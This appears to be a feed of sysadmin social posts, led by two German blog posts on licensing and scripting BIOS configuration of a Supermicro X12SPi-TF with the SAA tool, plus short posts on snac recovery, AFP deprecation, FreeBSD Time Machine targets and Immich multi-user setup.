Yesterday, they suffered severe file system corruption on their device, and I lent them a hand with the recovery. For GoToSocial, they restored the DB from the previous backup and got it running again. For snac, although a few files were lost, no action was necessary... it just started back up and did what it had to do, bringing the instance back to full operation.
This goes to show that when software is well-designed and intentionally kept simple, it's also easier to get back up and running when something goes wrong. In this case, snac's "files-only" approach demonstrated excellent resilience.
Thanks, @grunfink !
#snac2 #snac #ThankYouTuesday #Efficiency #IT #SysAdmin #OwnYourData
We've just had someone in another team create a host called "something".
We are yet to identify the responsible user, so for now it is someone's something.
And something is reporting an error in our monitoring dashboard. So something is wrong with something for someone.
Im letzten Beitrag ging es darum, die BIOS-Einstellungen meines Supermicro X12SPi-TF überhaupt erst als Datei in die Hand zu bekommen. Das Ergebnis war eine XML mit 372 Einstellungen, und der Weg dorthin führte über eine Lizenz für 28,17 Euro.

Damit war die halbe Arbeit getan. Eine Konfiguration auslesen zu können ist schön, aber der eigentliche Gewinn liegt darin, sie auch zurückschreiben zu können. Genau das habe ich jetzt gemacht, und zwar zum ersten Mal überhaupt an dieser Maschine: sieben Einstellungen geändert, ohne den Rechner ins Setup zu booten, ohne Tastatur, ohne die Fernkonsole des Management-Controllers.
Vorweg die gute Nachricht für alle, die schon rechnen: die kleine Lizenz deckt das Schreiben mit ab. Ich hatte damit gerechnet, dass Supermicro genau an dieser Stelle noch einmal die Hand aufhält, und das tut es auch, aber nur an einer sehr kleinen Ecke. Von den 372 Einstellungen tragen 21 den Vermerk, dass sie die große Lizenz verlangen. Es sind ausschliesslich Zertifikatseinträge für KMIP-Server und HTTPS-Boot. Nichts davon betrifft normale Setup-Optionen.
Der langweiligste Teil eines solchen Artikels ist die Liste der geänderten Werte. Der interessante Teil ist die Begründung, deshalb fange ich damit an.
Mein Rechner bootet von einer NVMe-SSD. Er hat das noch nie anders gemacht und wird es auch nicht. Trotzdem lädt das BIOS bei jedem Start die Pre-Boot-Netzwerktreiber für vier Netzwerkanschlüsse, jeweils für IPv4 und IPv6, und baut daraus Boot-Einträge, die niemand benutzt. Dazu kommen die Option-ROMs von drei leeren Steckplätzen.
Ein Option-ROM ist ein kleines Stück Firmware auf einer Steckkarte, das beim Start ins BIOS geladen wird, damit die Karte schon vor dem Betriebssystem funktioniert. Für eine Netzwerkkarte heisst das Netzwerk-Boot, für einen Speichercontroller das Booten von daran angeschlossenen Platten. Wer von keinem dieser Geräte bootet, braucht den Code nicht.
Also:
– Network Stack von *Enabled* auf *Disabled*. Damit fällt die komplette UEFI-Netzwerkinitialisierung weg. – Onboard LAN1 Option ROM aus. Der Pre-Boot-Treiber der onboard X550 wird nicht gebraucht. – CPU SLOT6 OPROM aus. Dort steckt meine X710. Dazu gleich mehr, das ist der eigentliche Grund für die Aktion. – CPU SLOT1, SLOT2 und SLOT7 OPROM aus. Alle drei Steckplätze sind leer.
Bei den drei leeren Steckplätzen bin ich ehrlich: der Zeitgewinn ist exakt null. Wo keine Karte steckt, gibt es auch kein Option-ROM zu laden. Ich habe sie trotzdem mitgenommen, weil ich einen dokumentierten Sollzustand haben will und nicht eine Mischung aus bewusst gesetzt und zufällig übrig.
Die siebte Änderung ist die, um die es mir wirklich ging.
Beim Schreiben meiner BIOS-Serie ist mir etwas aufgefallen, das ich mir lange nicht erklären konnte. Mein Prozessor ist ein Xeon Gold 5315Y, Ice Lake-SP. Diese Generation beherrscht Hardware P-States, kurz HWP. Die CPU regelt ihren Takt dabei selbst, in feineren Stufen und deutlich schneller, als das Betriebssystem es könnte.
Nur meldete mein Kernel davon nichts. In /proc/cpuinfo fehlte das hwp-Flag, der Treiber intel_pstate lief im passiven Modus, und die Taktregelung machte der Governor schedutil. Also genau der Zustand, den man auf einer CPU erwartet, die HWP gar nicht kann.
Ich habe eine Weile in Richtung Kernel gesucht. Das war die falsche Richtung. Der Schalter sass im BIOS, ziemlich tief vergraben:
Advanced > CPU Configuration > Advanced Power Management Configuration
> Hardware PM State Control > Hardware P-States [Disable]Der Auslieferungszustand dieser Option ist tatsächlich *Disable*. Es gibt vier Werte, und der Hilfetext im BIOS beschreibt sie so:
Disable hardware will choose a P-state setting for
the system based on an OS request
Native Mode hardware will choose a P-state setting
based on OS guidance
Native Mode with No Legacy Support hardware will choose a P-state setting
independently without OS guidance
Out of Band Mode hardware autonomously choose a P-state
without OS guidanceIch habe Native Mode genommen, also die zahmste der drei aktiven Varianten. Der Unterschied zu den beiden anderen ist wichtig: bei *Native Mode* behält das Betriebssystem seinen Einfluss, es wandert nur die Feinsteuerung in die CPU. Bei den beiden anderen wird der Kernel bei der Taktwahl übergangen, und dann kann er dir auch nicht mehr sinnvoll sagen, was die CPU gerade tut.
Diese Liste finde ich wichtiger als die Liste der Änderungen, denn hier hätte ich mir den Rechner unbedienbar machen können.
Das Option-ROM von SLOT4 bleibt an. Dort sitzt die Grafikkarte. Ihr GOP-Modul ist das, was beim Start überhaupt ein Bild auf den Monitor bringt. Wer es abschaltet, sitzt bis zum Laden des Grafiktreibers im Dunkeln, und wenn dabei etwas schiefgeht, sitzt er dauerhaft im Dunkeln.
Onboard Video Option ROM bleibt an. Das ist die Grafik des Management-Controllers, und daran hängt die Fernkonsole. Schaltet man sie ab, bleibt beim Start das Fenster schwarz, über das man aus der Ferne ins Setup kommt. Das ist genau der Rettungsweg, den man sich nicht abschneiden will, wenn man gerade anfängt, das BIOS aus dem laufenden Betrieb heraus umzukonfigurieren.
Beide NVMe-Option-ROMs bleiben an. Das erste trägt das Betriebssystem. Auf das zweite soll irgendwann Windows, und auch wenn der Bootloader auf der ersten Platte das Kommando behält, muss die zweite dem Firmware-Bootmanager sichtbar bleiben.
Legacy USB Support bleibt an. Hier hätte ich vermutlich etwas Startzeit gewinnen können. Ich habe es gelassen, weil ich den Gewinn nicht gemessen habe und das Risiko eine tote Tastatur im Setup wäre. Eine Einstellung, deren Nutzen man nicht beziffern kann, deren Schaden aber konkret ist, ändert man nicht.
Naheliegend wäre, die ausgelesene XML zu bearbeiten und komplett zurückzuschreiben. Bei 372 Einstellungen und 260 Kilobyte ist das unnötig riskant, und es ist auch nicht der vorgesehene Weg.
Das Werkzeug kennt einen Filter, der genau die Einstellungen ausgibt, die vom Auslieferungszustand abweichen:
./saa -c GetCurrentBiosCfg --file nondefault.xml --overwrite --filter nondefault
Heraus kommt eine kleine Datei mit derselben Struktur wie die grosse, nur eben mit den Menüzweigen, die auch wirklich etwas enthalten. Und genau diese Struktur nimmt das Schreibkommando entgegen. Teildateien sind also kein Trick, sondern der normale Betriebsfall.
Hier der erste Fallstrick, und der hat mich ehrlich geärgert: die eingebaute Hilfe des Werkzeugs beschreibt den Filter als Ziffer.
--filter Sets filter type to: 1 = nondefault
Die Ziffer 1 wird abgewiesen. Das Kommando bricht ab und wirft den Hilfetext aus, der einem gerade die Ziffer empfohlen hat. Akzeptiert wird ausschliesslich das ausgeschriebene Wort nondefault. Wenn du also an dieser Stelle hängst, liegt es nicht an dir.
Meine Änderungsdatei habe ich nicht getippt, sondern mit einem kleinen Python-Skript aus dem Auslesestand erzeugt. Das klingt nach Übertreibung für sieben Werte, hat aber einen handfesten Grund: die Einstellungen müssen im richtigen Menüzweig stehen, und die Menünamen sind lang und fehleranfällig. CPU SLOT2 PCI-E 4.0 X8(IN X16) OPROM vertippt sich schneller, als man denkt, und ein Tippfehler im Namen führt nicht zu einer Fehlermeldung, sondern dazu, dass die Einstellung stillschweigend nicht gesetzt wird.
Das Schreiben selbst ist unspektakulär:
./saa -c ChangeBiosCfg --file change-boot-oprom-hwp.xml Status: The BIOS configuration is updated for the managed system Note: You have to reboot or power up the system for the changes to take effect.
Es gibt eine Option --reboot, die den Neustart gleich mit erledigt. Die habe ich weggelassen. Wann ein Rechner neu startet, entscheide ich lieber selbst.
Nach dem Schreiben will man natürlich nachsehen, ob es geklappt hat. Also dasselbe Auslesekommando noch einmal, und dann steht da:
Hardware P-States = Disable (geschrieben: Native Mode) Network Stack = Enabled (geschrieben: Disabled) CPU SLOT6 PCI-E 4.0 X16 OPROM = EFI (geschrieben: Disabled)
Nichts. Alle alten Werte, unverändert.
Der erste Reflex ist, das Schreibkommando noch einmal laufen zu lassen. Tu das nicht. Das Auslesen liefert die aktive Konfiguration, und die ändert sich erst beim nächsten Start. Deine Änderung liegt so lange in einem Bereich, den das Werkzeug nicht anzeigt. Zwischen dem Schreiben und dem Neustart gibt es damit keine Möglichkeit, die Änderung zu überprüfen, ausser dem Rückgabewert des Kommandos.
Das ist unschön, aber es ist logisch. Die Einstellungen werden erst beim Start aus dem Speicher gelesen, und vorher gibt es schlicht nichts Aktives, das anders wäre.
Und dann stimmt alles. Die Zahl der Abweichungen vom Auslieferungszustand ist von sechs auf dreizehn gestiegen, also genau um meine sieben:
Quiet Boot Unchecked Restore on AC Power Loss Stay Off Power Button Function 4 Seconds Override Hardware P-States Native Mode Network Stack Disabled Re-Size BAR Support Enabled VGA Priority Offboard CPU SLOT1 PCI-E 4.0 X8 OPROM Disabled CPU SLOT2 PCI-E 4.0 X8(IN X16) OPROM Disabled CPU SLOT6 PCI-E 4.0 X16 OPROM Disabled CPU SLOT7 PCI-E 4.0 X8 OPROM Disabled Onboard LAN1 Option ROM Disabled WHEA Support Disabled
Die Netzwerk-Booteinträge sind verschwunden, übrig bleibt der Bootloader und die eingebaute Shell:
BootCurrent: 000F BootOrder: 000F,0001 Boot0001* UEFI: Built-in EFI Shell Boot000F* ubuntu
Und der Punkt, um den es mir ging, ist eingetreten. Der Prozessor meldet jetzt Fähigkeiten, die er die ganze Zeit hatte:
$ grep -o ' hwp[_a-z]*' /proc/cpuinfo | sort -u hwp hwp_act_window hwp_epp hwp_pkg_req $ cat /sys/devices/system/cpu/intel_pstate/status active
Der Treiber ist damit vom passiven in den aktiven Modus gewechselt. Was dabei kurz irritiert: der Governor heisst jetzt powersave statt schedutil, und das sieht nach einem Rückschritt aus. Ist es nicht. Bei intel_pstate im aktiven Modus ist powersave der Name für den Betrieb, bei dem die Hardware regelt. Wie sie das tut, steuert ein separater Wert:
$ cat /sys/devices/system/cpu/cpu0/cpufreq/energy_performance_preference balance_performance
Die CPU geht im Leerlauf auf 800 MHz und hat den vollen Turbo bis 3600 MHz zur Verfügung. Genau so soll es sein.
Wichtig war mir noch die Gegenprobe, dass ich mir das Netzwerk nicht zerschossen habe. Die Karte, deren Option-ROM ich abgeschaltet habe, ist schliesslich die, über die diese Maschine am Netz hängt:
$ ethtool ens6f1np1 | grep -E 'Speed|Link detected' Speed: 10000Mb/s Link detected: yes
Unverändert. Das ist auch zu erwarten, denn der Treiber im laufenden Betrieb kommt aus dem Kernel und hat mit dem Option-ROM nichts zu tun. Das Option-ROM ist reiner Startcode. Trotzdem ist das der Punkt, an dem die meisten zögern, deshalb steht die Messung hier.
Ein Punkt ist noch offen, und den will ich nicht verschweigen: der ursprüngliche Anlass für das Abschalten von SLOT6 war eine Meldung auf der Treiberstatus-Seite im Setup, wo meine Netzwerkkarte seit einem Firmware-Update als *Failed* geführt wird. Ob die Meldung jetzt weg ist, kann ich von aussen nicht sehen. Das prüfe ich beim nächsten Setup-Besuch nach.
Diese Frage lag für mich die ganze Zeit im Raum, und die Antwort ist unbefriedigend.
Es gäbe einen herstellerneutralen Weg unter Linux. Der Kernel kennt eine Geräteklasse namens firmware-attributes, über die sich BIOS-Einstellungen als ganz normale Dateien lesen und schreiben lassen. Der Firmware-Updater fwupd kann das seit Version 1.8.4 direkt bedienen. Das wäre die Lösung: ein Kommando, egal welcher Hersteller.
Auf meiner Maschine sieht das so aus:
$ ls /sys/class/firmware-attributes/ ls: cannot access '/sys/class/firmware-attributes/': No such file or directory $ fwupdmgr get-bios-setting This system doesn't support firmware settings
Das Hilfsmodul dafür liegt im Kernel, es ist also nicht so, dass die Infrastruktur fehlen würde:
/lib/modules/7.0.0-28-generic/kernel/drivers/platform/x86/firmware_attributes_class.ko.zst
Was fehlt, ist der Treiber des Herstellers. Der Kernel bringt genau drei mit:
drivers/platform/x86/dell/dell-wmi-sysman Dell drivers/platform/x86/lenovo/think-lmi Lenovo drivers/platform/x86/hp/hp-bioscfg HP
Supermicro ist nicht dabei. Statt eines Treibers, der diese Kernel-Schnittstelle bedient, gibt es ein eigenes Werkzeug und eine Lizenz. Auf einem Dell oder Lenovo wäre der Inhalt dieses Beitrags ein Einzeiler ohne Zusatzkosten.
Ganz ohne Oberfläche ist man aber nicht. Das Werkzeug bringt einen textbasierten Editor mit, der das Setup im Terminal nachbaut:
./saa -c GetCurrentBiosCfg --tui
Dazu gibt es --compact, das anschliessend nur die geänderten Zeilen herausschreibt. Über eine SSH-Pipe blieb das Fenster bei mir schwarz, es braucht ein echtes Terminal. Ausprobiert habe ich es deshalb noch nicht richtig. Und es gibt das Werkzeug ausserdem als Windows-Version und als Variante für die UEFI-Shell, also für den Fall, dass überhaupt kein Betriebssystem installiert ist.
Eine echte grafische Oberfläche gibt es auch, sie heisst SSM. Die will dann allerdings wieder die grosse Lizenz.
Das Wichtigste zum Schluss, und man legt es sich besser vorher zurecht als hinterher. Vor dem Schreiben habe ich den vollständigen Stand weggesichert. Der Rückweg ist dann dasselbe Kommando mit dieser Datei:
./saa -c ChangeBiosCfg --file bios-current-2026-08-09.xml
Als Notnagel gibt es darunter noch LoadDefaultBiosCfg, das alles auf den Auslieferungszustand zurücksetzt. Das ist aber ein grober Hebel: es wirft auch die sechs Abweichungen weg, die ich absichtlich eingestellt habe, und die stehen dann eben nicht mehr so, wie ich sie haben will. Die Teildatei ist der bessere Weg, der Vollreset die letzte Reserve.
Und weil es hier um Firmware geht, der offensichtliche Hinweis: bei einem Rechner, an den du nicht rankommst, änderst du keine Boot-Einstellungen, ohne dass jemand vor Ort ist oder die Fernkonsole zuverlässig läuft. Ich habe das Option-ROM der Grafik und das des Management-Controllers genau deshalb nicht angefasst.
Sieben Einstellungen, ein Neustart, kein Setup-Besuch. Das klingt nach wenig, ändert aber die Arbeitsweise. BIOS-Einstellungen waren für mich bisher etwas, das man beim Aufbau einmal einstellt und danach ungern anfasst, weil jede Änderung einen Neustart mit Tastatur und Monitor bedeutet. Jetzt sind sie eine Datei, die ich versionieren, vergleichen und zurückspielen kann.
Der schönste Nebeneffekt war die Sache mit den Hardware P-States. Ich hatte das Verhalten meiner CPU wochenlang für eine Eigenheit des Kernels gehalten und in die falsche Richtung gesucht. Es war eine einzige Zeile in einem Menü, das vier Ebenen tief liegt und das ich beim Durchklicken nie geöffnet hatte. Eine durchsuchbare Datei aller 372 Einstellungen hätte mir das in dreissig Sekunden gezeigt.
Falls du auf demselben Board sitzt: das Auslesen ist der Beitrag davor, das Schreiben braucht keine weitere Lizenz, und die drei Stolperstellen sind der Filter, der nur als Wort funktioniert, die Gegenprobe, die vor dem Neustart nichts zeigt, und die Versuchung, mehr auf einmal zu ändern, als man beim nächsten Start noch reparieren kann.
Siehe auch: Achtundzwanzig Euro für eine Textdatei: die BIOS-Konfiguration meines Supermicro-Boards auslesen und die Serie BIOS erklärt.
Wenn dazu etwas unklar ist oder du es auf deinem Board anders erlebt hast, dürft ihr mich sehr gerne fragen.
In meiner Serie BIOS erklärt arbeite ich mich durch das Setup eines Supermicro X12SPi-TF. Die Grundlage dafür war bisher eine Bildschirmaufnahme: ich bin durch alle Menüs gelaufen, habe das Video in Einzelbilder zerlegt und die Werte abgetippt. Das funktioniert, ist aber Handarbeit, und Handarbeit übersieht Dinge.
Was ich eigentlich wollte, ist eine Datei. Eine Liste aller Optionen mit ihrem aktuellen Wert, maschinenlesbar, damit ich sie durchsuchen und mit einem späteren Stand vergleichen kann. Das Board kann das. Es rückt es nur nicht heraus.
Der erste Weg führt über Redfish, die HTTP-Schnittstelle des Management-Controllers. Der passende Endpunkt existiert, antwortet aber nicht mit Daten:
GET /redfish/v1/Systems/1/Bios HTTP 403 "MessageId": "SMC.1.0.OemLicenseNotPassed", "Message": "Not licensed to perform this request. The following licenses DCMS were needed"
Der zweite Weg ist Supermicros eigenes Kommandozeilenwerkzeug. Es heißt inzwischen SAA, SuperServer Automation Assistant, und liegt dem BIOS-Paket bei. Es kann genau das, was ich suche, und arbeitet dabei nicht über das Netz, sondern direkt über die Firmware:
./saa -c GetCurrentBiosCfg --file bios-current.xml ExitCode 80 Node product key is not activated. One of the node product key (SFT-OOB-LIC or SFT-DCMS-SINGLE) should be activated
Der dritte Weg wäre, die UEFI-Variablen selbst zu lesen. Die liegen unter /sys/firmware/efi/efivars/, und tatsächlich gibt es dort Einträge, die nach BIOS-Einstellungen aussehen. Nur sind das undurchsichtige Datenblöcke ohne die Zuordnungstabelle des Boards. Man sieht Bytes, aber man weiß nicht, welches Byte welcher Menüpunkt ist.
Drei unabhängige Wege, dieselbe Sperre. An dieser Stelle habe ich in meinen Notizen etwas geschrieben, das sich später als falsch herausstellte. Dazu komme ich am Ende.
Lies die beiden Fehlermeldungen oben noch einmal nebeneinander. Sie verlangen nicht das Gleiche. Redfish nennt namentlich DCMS. SAA nennt SFT-OOB-LIC oder SFT-DCMS-SINGLE, also eine von zweien.
Das ist der Punkt, an dem man leicht zu viel Geld ausgibt. Supermicro verkauft für diese Board-Generation zwei Lizenzen. Die kleine heißt Out of Band, kurz OOB. Die große heißt DCMS und kostet etwa das Fünffache. Wer nur die Fehlermeldung von Redfish liest, kauft DCMS. Wer die Fehlermeldung von SAA liest, merkt, dass es für seinen Zweck auch die kleine tut.
Nebenbei taucht dieselbe Lizenz an einer Stelle auf, die ich nicht erwartet hätte. Im Handbuch zum Board stehen bei zwei Sicherheitseinstellungen, nämlich beim Abschalten der vorderen und der hinteren USB-Anschlüsse, die Worte *available for configuration if the SFT-DCMS-SINGLE license is installed*. Es fehlen also nicht nur Management-Schnittstellen. Es fehlen zwei Menüpunkte im Setup selbst.
Bei dieser Recherche stößt man unweigerlich auf ein Werkzeug auf GitHub, das Supermicro- Produktschlüssel behandelt. Für die Generationen 9 bis 11 kann es welche erzeugen, denn dort war der Schlüssel ein berechneter Wert über die MAC-Adresse des Management-Controllers.
Für die zwölfte Generation, also mein Board, kann es das nicht, und das Projekt schreibt es selbst deutlich hin: dieses Format lässt sich mit dem Werkzeug prüfen, aber nicht erzeugen. Der Grund ist, dass Supermicro umgestellt hat. Der Schlüssel ist heute eine von Supermicro signierte Datei, und der Management-Controller prüft die Signatur gegen einen öffentlichen Schlüssel in seiner eigenen Firmware. Ohne den privaten Schlüssel des Herstellers entsteht da nichts Gültiges.
Mein Board bestätigt das Format auf Nachfrage:
Node Product Key Format..........JSON
Damit ist die naheliegende Abkürzung nicht moralisch, sondern rechnerisch verschlossen. Man muss die Frage also wirklich beantworten.
Gekauft habe ich im Supermicro eStore. 23,67 Euro netto, 28,17 Euro brutto. Bei der Bestellung wählt man das Mainboard-Modell aus einer Liste, und mein X12SPi-TF steht darin. Das ist erwähnenswert, weil mehrere Händlerbeschreibungen dieser Lizenz nur X10 und X11 nennen. Diese Texte sind veraltet.
Jetzt kommt der Teil, den ich falsch erwartet hatte. Ich dachte, ich kaufe und bekomme einen Schlüssel. So läuft es nicht. Man bekommt zunächst nur eine Zertifikatsnummer und die Aufforderung, den Schlüssel selbst zu erzeugen. Dafür meldet man sich im Store an, wählt die Bestellung aus und gibt an, für welches Gerät der Schlüssel gelten soll: entweder die MAC-Adresse des Management-Controllers oder die Seriennummer des Boards.
Die Bindung an die Hardware entsteht also nicht beim Verkauf, sondern beim Käufer, im Moment des Erzeugens. Das ist konsequent, denn Supermicro weiß beim Verkauf ja gar nicht, in welchem Gerät die Lizenz landen soll. Es heißt aber auch, dass man sich vertippen kann, und dann hat man einen Schlüssel für ein Gerät, das es nicht gibt.
Der Ablauf war zügig. Bestellbestätigung um 14:17, die Freigabe zum Erzeugen um 14:42, der fertige Schlüssel um 14:44, aktiv im Board um 14:46. Unter einer halben Stunde vom Klick bis zur Funktion, und die zugesagte Stunde war damit nicht zu optimistisch.
Der Schlüssel selbst ist eine kleine Textdatei, benannt nach der MAC-Adresse, mit einem JSON-Objekt darin: Lizenzname, Ausstellungsdatum und eine lange Signatur. Mehr ist es nicht.
Eine Kuriosität am Rande: die Mail mit dieser Textdatei trägt einen Ausfuhrhinweis der US-Regierung. Die Ware sei nur für das Bestimmungsland freigegeben und dürfe nicht weiterveräußert oder an Dritte weitergegeben werden. Das gilt hier für eine Datei von wenigen hundert Byte, deren einzige Wirkung darin besteht, in einem Verwaltungscontroller einen Menüpunkt sichtbar zu machen.
Supermicro nennt vier Wege, den Schlüssel einzuspielen: die Weboberfläche des Management-Controllers, das Werkzeug SUM, die Verwaltungssoftware SSM und Redfish. Die Weboberfläche ist der ruhigste Weg, weil sie eine Bestätigungsseite hat, und bei einem Schlüssel, der genau einmal auf genau ein Gerät passt, will man die haben.
Wer es lieber skriptet, findet die passenden Endpunkte im Management-Controller, und die sind auch ohne Lizenz erreichbar:
POST /redfish/v1/Managers/1/LicenseManager/Actions/LicenseManager.ActivateLicense POST /redfish/v1/Managers/1/LicenseManager/Actions/LicenseManager.ClearLicense GET /redfish/v1/Managers/1/LicenseManager/QueryLicense
Die Abfrage danach gibt genau den Inhalt der Datei zurück, die man hochgeladen hat. Der Controller speichert den Schlüssel also unverändert und prüft ihn bei Bedarf.
Nach der Aktivierung meldet SAA einen anderen Zustand:
Node Product Key Activated.......SFT-OOB-LIC Feature Toggled On...............Yes BMC Supports OOB BIOS Config.....Yes BIOS Supports OOB BIOS Config....Yes
Und dasselbe Kommando, das vorher mit ExitCode 80 abgebrochen ist, läuft durch:
./saa -c GetCurrentBiosCfg --file bios-current.xml File "bios-current.xml" is created.
Heraus kommt eine Datei von 260 Kilobyte mit 60 Menüs und 372 Einstellungen. Zum Vergleich: das offizielle Handbuch beschreibt 180 Optionen. Und die Datei enthält pro Eintrag mehr, als man im Setup sieht, nämlich zusätzlich den Auslieferungszustand und den Hilfetext:
<Setting name="Quiet Boot" checkedStatus="Unchecked" type="CheckBox">
<Information>
<DefaultStatus>Checked</DefaultStatus>
<Help>Enables or disables Quiet Boot option</Help>
</Information>
</Setting>Der Auslieferungszustand ist der eigentliche Gewinn. Damit sehe ich auf einen Blick, welche Einstellungen an dieser Maschine vom Werkszustand abweichen, und das ist genau die Liste, die man nach einem BIOS-Update wiederherstellen will.
Zwei komplette Hauptmenüs standen darin, die ich beim Durchklicken schlicht nie geöffnet hatte. Und ein Untermenü, das ich in meinen Notizen als offene Lücke geführt habe, war vollständig enthalten. So viel zum Thema Handarbeit übersieht Dinge.
Jetzt der ehrliche Teil, und der ist mir wichtiger als der Erfolg. Ich hatte vor dem Kauf drei Messungen aufgeschrieben, damit ich hinterher vergleichen kann. Drei von vier Erwartungen sind eingetroffen, und die vierte war die interessante.
Der Redfish-Endpunkt, mit dem alles anfing, antwortet weiterhin mit 403 und verlangt weiterhin DCMS. Die kleine Lizenz öffnet den Weg über SAA und eben nicht den über Redfish. Wer also ausdrücklich die Netzwerkschnittstelle braucht, etwa weil er hunderte Server ohne Betriebssystem konfigurieren will, kommt um die große Lizenz nicht herum.
Das hat eine Nebenwirkung, die ich nicht auf dem Zettel hatte. Der Firmware-Updater fwupd kann inzwischen mit Supermicros Redfish-Schnittstelle sprechen. Er sieht bei mir aber nur zwei von zwölf Firmware-Komponenten, und die beiden BIOS-Einträge fehlen. Der Grund ist, dass er zur Identifikation eines Geräts das Objekt lesen muss, das hinter genau diesem gesperrten Endpunkt liegt. Die Lizenz sperrt hier also nicht das Aktualisieren, sondern das Erkennen, und das Aktualisieren scheitert dann als Folge. Nach der Aktivierung sind es unverändert zwei von zwölf.
Und der dritte Weg, den ich vorher gar nicht gesehen hatte: fwupd sieht den BIOS-Speicher auch ganz direkt am Chipsatz, liest die Version korrekt aus und verweigert trotzdem den Dienst:
Internal SPI Controller (BIOS):
Aktuelle Version: 2.5
Probleme: Device firmware has been lockedDas ist keine Lizenzsache, und daran hat sich erwartungsgemäß nichts geändert. Der Speicher ist auf Chipsatzebene schreibgeschützt, weil das Board mit aktivem Root of Trust läuft. Ein BIOS, das sich aus einem laufenden Betriebssystem heraus überschreiben lässt, wäre genau die Lücke, die dieser Schutz verhindern soll. Der Reflex sagt hier Hersteller blockiert Linux. Tatsächlich blockiert eine Sicherheitsfunktion, die ich selbst haben will.
Bleibt der Satz, den ich weiter oben angekündigt habe. In meinen Notizen stand nach der dritten Absage sinngemäß: drei unabhängige Wege, dieselbe Sperre, nicht erneut versuchen.
Gemessen hatte ich: ohne Lizenz gibt es keinen Weg. Aufgeschrieben hatte ich: es gibt keinen Weg. Und die dritte Möglichkeit, nämlich die Lizenz einfach zu kaufen, kam in meiner Aufzählung der drei gesperrten Wege überhaupt nicht vor, obwohl das Werkzeug sie mir wörtlich genannt hatte.
Dass drei Wege an derselben Sperre scheitern, beweist, dass es eine Sperre gibt. Es beweist nicht, dass sie unüberwindbar ist. Wenn eine Fehlermeldung den Namen der fehlenden Berechtigung nennt, ist das ein Hinweis und kein Schlusspunkt.
Für einen einzelnen Rechner zu Hause: nur, wenn man Freude daran hat. Ich hätte die Werte auch weiter abschreiben können, und der Screencast hat mir immerhin eine fünfzehnteilige Serie eingebracht, die aus einer XML-Datei nie entstanden wäre. Man liest eine Datei nicht so aufmerksam wie ein Menü, durch das man sich selbst klicken muss.
Für alles, was mehr als eine Handvoll Maschinen betrifft, sieht es anders aus. Konfiguration auslesen, versionieren, nach einem Update wieder einspielen und im Zweifel gegen einen bekannten Stand vergleichen, das ist bei 28 Euro pro Board keine Diskussion. Ärgerlich finde ich nur, dass man diese Rechnung überhaupt aufmachen muss. Es geht um das Auslesen der eigenen Einstellungen auf der eigenen Hardware.
Wenn du auf demselben Board sitzt und dieselbe Fehlermeldung vor dir hast, ist die Kurzfassung: für die Konfiguration reicht die kleine Lizenz, für Redfish brauchst du die große, und für Firmware-Updates brauchst du bei einem X12 mit Root of Trust vermutlich gar keine.
Siehe auch: BIOS erklärt, Teil 1: ein Serverboard als Workstation und der Weg ins Setup und die übrigen Folgen unter BIOS & Firmware.
Wenn dazu etwas unklar ist oder du es auf deinem Board anders erlebt hast, dürft ihr mich sehr gerne fragen.
SMB Is Mandatory Now: What macOS Dropping the AFP Client Means for Storage Engineers ― Mitaka Digital | DEV Community
"For four decades, the Apple Filing Protocol quietly underwrote every "just works" file-sharing experience in the Apple ecosystem. That era has ended. Apple deprecated the AFP client in macOS Sequoia 15.5, carried a removal warning through macOS 26 Tahoe, and shipped the macOS 27 "Golden Gate" developer beta with no AFP client at all. If your storage estate still serves Mac clients over afp://, the compatibility gap is live today, not on a future roadmap. …"
#AFP #Apple #CIFS #Samba #SMB #NAS #storage #macOS #networking #sysadmin
Mein Sohn hat auf seinem Handy immer mehr wichtige Bilder... Google Fotos speicher Läuft über...
Zeit für #immich Hab bereits seit Monaten bei mir alles umgestellt... Nun Multi User Platform 😁
Früher: Googlen wie das geht - über web Interface Durchquälerei - Frust vorprogrammiert
Heute: eine Nachricht an mein #hermes KI Agent - der macht alles über immich API - Sendet mir ne txt mit allen nötigen Infos - Sohn richtet es ein - 5 Minuten läuft sein Backup
Und ich "weiß" wie das umgesetzt ist:
Technische Umsetzung der Trennung:
Immich isoliert jeden Benutzer sowohl in der Datenbank als auch im Dateisystem komplett:
- Dateisystem: Jeder User bekommt ein eigenes Verzeichnis nach seiner UUID. Jakobs Daten liegen unter `/mnt/immich-data/upload/upload/a5a86a77-.../`, deine unter `/mnt/immich-data/upload/upload/6f5b4988-.../`. Das gilt für alle drei Storage-Typen: Original-Uploads, Thumbnails und encoded Videos. Keine Überschneidung möglich.
- Datenbank: Jeder Asset-Eintrag hat einen `ownerId` Foreign Key auf den User. Immich filtert bei jeder Abfrage nach dem eingeloggten User — Jakob sieht nur seine eigenen Fotos, du nur deine.
- Backup: Das Borg-Backup sichert `/mnt/immich-data` komplett, also beide User-Bereiche.
Aktuelle Verteilung:
- Lars: 33.364 Assets, ~254 GB
- Jakob: 8 Assets, ~1,7 GB
- Disk: 332 GB von 697 GB belegt (48%)
Alles sauber getrennt. Jakob hat seinen eigenen Bereich, kann deine Fotos nicht sehen und umgekehrt. Falls du später teilen wollt, kann Immich das über **Shared Albums** — aber das müsstet ihr aktiv anlegen.
With Apple phasing out AFP in macOS 27 and Time Capsules officially reaching end-of-life, it's time to move network backups to proper SMB.
If you run a FreeBSD server, you can build a fast, rock-solid, and secure Time Machine target powered by ZFS and Samba - neatly isolated inside a FreeBSD jail using Bastille.
https://it-notes.dragas.net/2026/01/28/time-machine-freebsd-jail/
Keep your macOS backups running smoothly via SMBv3 (with full vfs_fruit support) and full dataset quota control on ZFS!
#FreeBSD #macOS #TimeMachine #ZFS #BastilleBSD #Samba #SysAdmin #Backup #OwnYourData #SelfHosted #BSD #RunBSD #OwnYourData
With Apple phasing out AFP in macOS 27 and Time Capsules officially reaching end-of-life, it's time to move network backups to proper SMB.
If you run a FreeBSD server, you can build a fast, rock-solid, and secure Time Machine target powered by ZFS and Samba - neatly isolated inside a FreeBSD jail using Bastille.
https://it-notes.dragas.net/2026/01/28/time-machine-freebsd-jail/
Keep your macOS backups running smoothly via SMBv3 (with full vfs_fruit support) and full dataset quota control on ZFS!
#FreeBSD #macOS #TimeMachine #ZFS #BastilleBSD #Samba #SysAdmin #Backup #OwnYourData #SelfHosted #BSD #RunBSD #OwnYourData
Bin seit 3 Jahren Vorstand vom Förderverein Grundschule Betzenberg eV #Ehrenamt #Ehrenmann :P
Wir organisieren immer kleinere Aktionen in der Schule - wiederkehrende Abläufe
4 Personen im Vorstand (Kassenwart + Schriftführer)
IT-Situation:
- Homepage bei Schulträger mit gehostet (Wordpress 🐌 )
- Jeder hat sein Daten bei sich liegen
Ich hab Kudelmudel an Daten wo ich nie die richtige Datei finde
